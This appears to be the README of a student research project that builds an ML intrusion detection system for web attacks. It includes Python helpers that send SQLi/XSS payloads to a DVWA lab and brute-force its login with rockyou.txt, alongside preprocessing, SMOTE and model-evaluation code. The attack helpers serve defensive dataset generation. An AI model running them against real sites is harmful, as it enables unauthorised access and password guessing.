This repository contains the full workflow for developing a machine-learning–based Network Intrusion Detection System (NIDS) that classifies application-layer web traffic into four classes:
- SQL Injection (SQLi)
- Cross-Site Scripting (XSS)
- Brute-Force Authentication Attacks
- Benign Web Traffic
The project integrates automated attack simulation, packet capture, flow-based feature extraction, dataset preprocessing, and model training into a single pipeline for detecting web-application attacks.
This project constructs a hybrid dataset derived from:
- Public SQL Injection datasets (Kaggle)
- SQLMap-generated SQLi traffic against DVWA
- XSStrike-generated XSS payloads
- Custom reflection-based attack scripts
- Brute-force authentication attempts
- Benign traffic captures
Captured packets are converted by CICFlowMeter into flow-based features, which are then cleaned, balanced with SMOTE, and used to train multiple ML classifiers.
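The cleaning step for a single CICFlowMeter CSV can be sketched as follows with pandas. This sketch assumes each capture contains only one traffic type, so one class label is applied per file. The `clean_flows` helper and the identifier column names are hypothetical. Match them to the header your CICFlowMeter build actually writes.

```python
import numpy as np
import pandas as pd

# Assumed identifier columns. Exact names depend on the CICFlowMeter build
# (the Java tool writes e.g. "Flow ID", "Src IP"; other ports use snake_case).
IDENTIFIER_COLUMNS = ("Flow ID", "Src IP", "Src Port", "Dst IP", "Timestamp")


def clean_flows(flows, label, id_columns=IDENTIFIER_COLUMNS):
    """Drop identifiers, non-numeric and non-finite values, and duplicates; attach a label."""
    frame = flows.copy()
    frame.columns = frame.columns.str.strip()  # some CSV exports pad headers with spaces
    frame = frame.drop(columns=[c for c in id_columns if c in frame.columns])
    # Keep numeric features only; this also discards any placeholder text label column
    numeric = frame.select_dtypes(include="number")
    # Divisions by zero in flow statistics can produce +/-inf, so treat them as missing
    numeric = numeric.replace([np.inf, -np.inf], np.nan).dropna().drop_duplicates()
    return numeric.assign(Label=label).reset_index(drop=True)
```

Labelling per file keeps the class assignment simple when each PCAP is recorded while only one attack script is running.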
```
RESEARCH PROJECT SCRIPTS/
│
├── Attack Scripts/
│   ├── Attack setup.md
│   ├── attack_script.py
│   └── bruteforce_script.py
│
├── Dataset Processing/
│   ├── SQL Dataset Preprocessing.ipynb
│   ├── XSS Dataset Preprocessing.ipynb
│   ├── final_sqli_dataset.csv
│   └── xss_dataset.csv
│
├── Datasets/
│   ├── final_sqli_dataset.csv
│   ├── Payloads.csv
│   ├── rockyou.txt
│   ├── sql_benign.txt
│   ├── sql_mal.txt
│   ├── xss_benign.txt
│   └── xss_mal.txt
│
├── EDA & ModelEval/
│   └── Web_Application_NIDS_EDA_and_Model_Training.ipynb
│
└── (PCAP files captured externally)
```
All attacks are executed against a DVWA instance hosted in VirtualBox.
| Component | Purpose |
|---|---|
| `attack_script.py` | Generates SQLi or XSS traffic by sending payloads and checking whether they are reflected in the response |
| `bruteforce_script.py` | Simulates repeated login attempts |
| Wordlists (`Datasets/*.txt`) | Define the malicious and benign payload variations |
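The reflection check described for `attack_script.py` can be sketched with the standard library alone. This is a hypothetical outline, not the repository's script. The target URL, the query parameter name (DVWA's reflected-XSS page is assumed to take `name`) and the session cookie are all assumptions. The verbatim-versus-escaped test is a simple heuristic.

```python
import html
import urllib.parse
import urllib.request


def send_payload(url, param, payload, cookie=None, timeout=5.0):
    """Send one payload as a GET query parameter and return the decoded response body."""
    query = urllib.parse.urlencode({param: payload})
    request = urllib.request.Request(f"{url}?{query}")
    if cookie:
        # DVWA pages need an authenticated session (assumed PHPSESSID/security cookies)
        request.add_header("Cookie", cookie)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.read().decode("utf-8", errors="replace")


def reflection_status(payload, body):
    """Heuristically classify how a payload comes back in an HTML response."""
    if payload in body:
        return "reflected"  # echoed verbatim, so markup such as <script> survives
    if html.escape(payload) in body:
        return "escaped"  # echoed, but HTML-encoded by the application
    return "absent"


def run_payloads(url, param, payloads, cookie=None):
    """Send each payload in turn and record whether it was reflected."""
    results = []
    for payload in payloads:
        body = send_payload(url, param, payload, cookie=cookie)
        results.append((payload, reflection_status(payload, body)))
    return results
```

A call might look like `run_payloads("http://<DVWA_IP>/vulnerabilities/xss_r/", "name", payloads, cookie="PHPSESSID=<session-id>; security=low")`. The exact path depends on how DVWA is installed. Because `html.escape` produces `&#x27;` for single quotes while PHP may emit `&#039;`, some escaped payloads can be reported as `absent`.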
Loopback capture:

```bash
sudo tcpdump -i lo -w dvwa_traffic.pcap port 80
```

Host-only VirtualBox capture:

```bash
sudo tcpdump -i vboxnet0 -w dvwa_traffic.pcap host <DVWA_IP>
```

The SQL Injection dataset is a hybrid built from:
- Kaggle SQL Injection dataset
- SQLMap-generated attack payloads
- Curated benign SQL patterns
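One way to assemble the hybrid SQLi table is sketched below with pandas. It assumes `sql_mal.txt` and `sql_benign.txt` hold one query per line. It uses a hypothetical `payload`/`label` schema (1 = malicious). The Kaggle column names are passed in as arguments because they are not fixed here.

```python
import pandas as pd


def label_payloads(malicious, benign):
    """Build a de-duplicated payload/label table (1 = malicious, 0 = benign)."""
    mal = [p.strip() for p in malicious if p.strip()]
    ben = [p.strip() for p in benign if p.strip()]
    frame = pd.DataFrame({"payload": mal + ben, "label": [1] * len(mal) + [0] * len(ben)})
    # A string present in both lists has no trustworthy label, so drop it
    conflicting = set(mal) & set(ben)
    frame = frame[~frame["payload"].isin(conflicting)]
    return frame.drop_duplicates(subset="payload").reset_index(drop=True)


def load_lines(path):
    """Read a one-payload-per-line text file such as sql_mal.txt."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return handle.read().splitlines()


def from_kaggle(df, text_col, label_col):
    """Map a Kaggle-style table onto the payload/label schema."""
    return df[[text_col, label_col]].rename(columns={text_col: "payload", label_col: "label"})


def merge_sources(*frames):
    """Concatenate sources and keep the first occurrence of each payload."""
    combined = pd.concat(frames, ignore_index=True)
    return combined.drop_duplicates(subset="payload").reset_index(drop=True)
```

For example, `merge_sources(label_payloads(load_lines("sql_mal.txt"), load_lines("sql_benign.txt")), from_kaggle(kaggle_df, "Query", "Label"))`, where `kaggle_df`, `"Query"` and `"Label"` are placeholders for the downloaded table and its actual column names.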
The XSS dataset was generated using:
- XSStrike payload generation
- Reflection-based XSS detection
- Manually crafted benign and malicious samples
The brute-force dataset was created via:
- the `rockyou.txt` wordlist
- `bruteforce_script.py`
- packet capture during repeated login attempts
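The brute-force traffic can be reproduced with a loop like the following sketch. It assumes that DVWA's brute-force module accepts `username`, `password` and `Login` as GET parameters and returns `Username and/or password incorrect.` on failure. The helper names are hypothetical and are not taken from `bruteforce_script.py`.

```python
import time
import urllib.parse
import urllib.request
from itertools import islice

# Assumed DVWA failure message on the brute-force page
FAILURE_MARKER = "Username and/or password incorrect."


def parse_wordlist(lines, limit=None):
    """Yield non-empty candidate passwords, stopping after `limit` lines if given."""
    for line in islice(lines, limit):
        word = line.rstrip("\r\n")
        if word:
            yield word


def read_wordlist(path, limit=None):
    """Stream a large wordlist such as rockyou.txt without loading it into memory."""
    # rockyou.txt may contain bytes that are not valid UTF-8, so replace them
    with open(path, encoding="utf-8", errors="replace") as handle:
        yield from parse_wordlist(handle, limit)


def login_attempt_url(base_url, username, password):
    """Build one GET login request for the (assumed) DVWA brute-force form."""
    query = urllib.parse.urlencode({"username": username, "password": password, "Login": "Login"})
    return f"{base_url}?{query}"


def brute_force(base_url, username, passwords, cookie, delay=0.0):
    """Try each password in order; return the first one that does not show the failure text."""
    for password in passwords:
        request = urllib.request.Request(
            login_attempt_url(base_url, username, password), headers={"Cookie": cookie}
        )
        with urllib.request.urlopen(request, timeout=5) as response:
            body = response.read().decode("utf-8", errors="replace")
        if FAILURE_MARKER not in body:
            return password
        time.sleep(delay)  # optional pacing between attempts
    return None
```

A run might look like `brute_force("http://<DVWA_IP>/vulnerabilities/brute/", "admin", read_wordlist("rockyou.txt", limit=1000), cookie="PHPSESSID=<session-id>; security=low")`. The `limit` argument keeps a capture to a manageable size.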
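The notebook `Web_Application_NIDS_EDA_and_Model_Training.ipynb` covers:
- EDA and feature inspection
- PCA visualisation
- SMOTE class balancing
- Model training: Random Forest (RF), XGBoost (XGB), LightGBM (LGBM), k-Nearest Neighbours (KNN) and Support Vector Machine (SVM)
- Evaluation with confusion matrices, F1-score and ROC-AUC
- Runtime benchmarking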
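The balancing and evaluation steps can be outlined as follows. This sketch uses only NumPy and scikit-learn. `smote_oversample` is a small from-scratch illustration of SMOTE's interpolation rule, in which each synthetic sample lies on the segment between a minority sample and one of its k nearest same-class neighbours. It stands in for a library implementation such as imbalanced-learn's `SMOTE`. The Random Forest and the synthetic data are placeholders for the notebook's models and CICFlowMeter features. In this sketch, oversampling is applied only to the training split, so the test set keeps the real class distribution.

```python
import time

import numpy as np
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import confusion_matrix, f1_score, roc_auc_score
from sklearn.model_selection import train_test_split
from sklearn.neighbors import NearestNeighbors


def smote_oversample(X, y, k=5, seed=0):
    """Oversample every minority class up to the majority count by SMOTE-style interpolation."""
    rng = np.random.default_rng(seed)
    classes, counts = np.unique(y, return_counts=True)
    target = counts.max()
    X_parts, y_parts = [X], [y]
    for cls, count in zip(classes, counts):
        needed = target - count
        if needed == 0:
            continue
        X_cls = X[y == cls]
        # k nearest neighbours within the class; the first neighbour is the point itself
        n_neighbors = min(k + 1, len(X_cls))
        if n_neighbors < 2:
            raise ValueError(f"class {cls} needs at least two samples to interpolate")
        _, idx = NearestNeighbors(n_neighbors=n_neighbors).fit(X_cls).kneighbors(X_cls)
        base = rng.integers(0, len(X_cls), size=needed)
        neigh = idx[base, rng.integers(1, n_neighbors, size=needed)]
        gap = rng.random((needed, 1))  # interpolation factor in [0, 1)
        X_parts.append(X_cls[base] + gap * (X_cls[neigh] - X_cls[base]))
        y_parts.append(np.full(needed, cls))
    return np.vstack(X_parts), np.concatenate(y_parts)


def evaluate(model, X_train, y_train, X_test, y_test):
    """Fit a model and report macro F1, one-vs-rest ROC-AUC, the confusion matrix and timings."""
    start = time.perf_counter()
    model.fit(X_train, y_train)
    train_seconds = time.perf_counter() - start
    start = time.perf_counter()
    pred = model.predict(X_test)
    proba = model.predict_proba(X_test)
    predict_seconds = time.perf_counter() - start
    # roc_auc_score expects positive-class scores only in the binary case
    scores = proba[:, 1] if proba.shape[1] == 2 else proba
    return {
        "macro_f1": f1_score(y_test, pred, average="macro"),
        "roc_auc_ovr": roc_auc_score(y_test, scores, multi_class="ovr"),
        "confusion": confusion_matrix(y_test, pred),
        "train_seconds": train_seconds,
        "predict_seconds": predict_seconds,
    }


if __name__ == "__main__":
    # Synthetic stand-in for the flow features: four imbalanced classes
    X, y = make_classification(
        n_samples=2000, n_features=20, n_informative=8, n_classes=4,
        weights=[0.55, 0.2, 0.15, 0.1], random_state=0,
    )
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.25, stratify=y, random_state=0
    )
    X_bal, y_bal = smote_oversample(X_train, y_train)
    results = evaluate(RandomForestClassifier(n_estimators=100, random_state=0),
                       X_bal, y_bal, X_test, y_test)
    print(f"macro F1 = {results['macro_f1']:.3f}, ROC-AUC (OvR) = {results['roc_auc_ovr']:.3f}")
    print(results["confusion"])
```

Swapping `RandomForestClassifier` for the other classifiers listed above only changes the `model` argument, which keeps the timing and metrics comparable across models.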
Tools and technologies:
- DVWA (Damn Vulnerable Web Application)
- VirtualBox
- SQLMap
- XSStrike
- tcpdump
- CICFlowMeter
- Python (scikit-learn, pandas, numpy, xgboost, lightgbm)
- Jupyter Notebook
- VS Code
To reproduce the workflow:
1. Start DVWA in VirtualBox.
2. Begin packet capture using tcpdump.
3. Run the attack scripts.
4. Stop the capture and convert the PCAP files to flow features using CICFlowMeter.
5. Run the preprocessing notebooks.
6. Train and evaluate the models in the EDA notebook.
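Starting the capture and running the attack scripts can be scripted so that the capture always brackets the attack run. This is a minimal sketch. It assumes the driver script itself is started with root privileges (for example via `sudo`), so `tcpdump` can open the interface without its own `sudo`. `packet_capture` and `tcpdump_command` are hypothetical helpers.

```python
import shlex
import signal
import subprocess
import time
from contextlib import contextmanager


def tcpdump_command(interface, output_file, bpf_filter):
    """Build the tcpdump invocation used for the DVWA captures (run as root)."""
    return ["tcpdump", "-i", interface, "-w", output_file, *shlex.split(bpf_filter)]


@contextmanager
def packet_capture(interface, output_file, bpf_filter):
    """Run tcpdump for the duration of the with-block, then stop it cleanly."""
    proc = subprocess.Popen(tcpdump_command(interface, output_file, bpf_filter))
    time.sleep(1)  # give tcpdump a moment to open the interface
    if proc.poll() is not None:
        raise RuntimeError(f"tcpdump exited early with code {proc.returncode}")
    try:
        yield proc
    finally:
        proc.send_signal(signal.SIGINT)  # SIGINT lets tcpdump flush and close the pcap file
        proc.wait(timeout=10)
```

For example, placing `subprocess.run([sys.executable, "attack_script.py"], check=True)` inside `with packet_capture("vboxnet0", "dvwa_traffic.pcap", "host <DVWA_IP>"):` captures exactly the traffic generated by that run. Any command-line arguments the attack script expects are not shown here.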
- Author: Mandisa Nyadenga, BTech (Hons) Computer Engineering, CPUT
- Supervisor: Dr. O. P. Babalola
- Cape Peninsula University of Technology (CPUT)